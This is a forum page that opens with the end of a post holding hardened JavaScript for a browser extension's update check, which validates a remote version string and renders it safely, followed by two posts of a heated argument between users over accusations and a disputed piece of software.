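function parseRemoteVersion(text) {
  const m = /^(\d+)\.(\d+)\.(\d+)$/.exec(text);
  return m ? m.slice(1, 4).map(Number) : null;
}
function cmpVersions(a, b) {
  for (let i = 0; i < 3; i++) if (a[i] !== b[i]) return a[i] > b[i] ? 1 : -1;
  return 0;
}

// `el` is any object with a textContent property (a real element in the popup).
// textContent never parses HTML, so the remote file cannot inject markup.
function renderUpdateNotice(el, remoteText, currentVersion) {
  const remote = parseRemoteVersion(remoteText);
  const current = parseRemoteVersion(currentVersion);
  let msg = "Update check failed: unexpected response";
  if (remote && current) {
    msg = cmpVersions(remote, current) > 0 ? `Update available: ${remote.join(".")}` : `Up to date (${current.join(".")})`;
  }
  el.textContent = msg;
  return msg;
}
```

Running auditManifest over the two manifests shows the original with two findings and the hardened one with none; a remote file that contains anything beyond a bare version string is rejected before it ever reaches the popup.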
#99 | |
|
Tango Down
Industry Role:
Join Date: Aug 2024
Location: Las Vegas
Posts: 963
|
Quote:
I'm giving you the stage here... What is your basis for any of this? Where are the facts? Can you point to anything?
__________________
TANGO DOWN! - Make those annoying GFY users disappear completely with a single click |
#100 | |
|
Too lazy to set a custom title
Industry Role:
Join Date: Aug 2004
Location: Canada
Posts: 49,934
|
Quote:
When did I call you dishonest? Or a stalker? Or a scammer? What threads? You called Legacy a scammer here, and you called others stalkers here, and you called cyberhustler a stalker and a scammer here, and you called someone named Osterholt a stalker here, but when did I say that about you?

My "facts" are about your latest software, and they are all laid out in this thread. You are making this personal when it's not. I dislike you, but there's no doubt that you are smart. There is no need for you to lie about your code, or its origins, or its capabilities or errors.

I pointed out issues with yours, and you say you fixed them, so, first, you're welcome, and now, continue with your promotion.

Done! Finished! Finito! Fin! Ciaobella!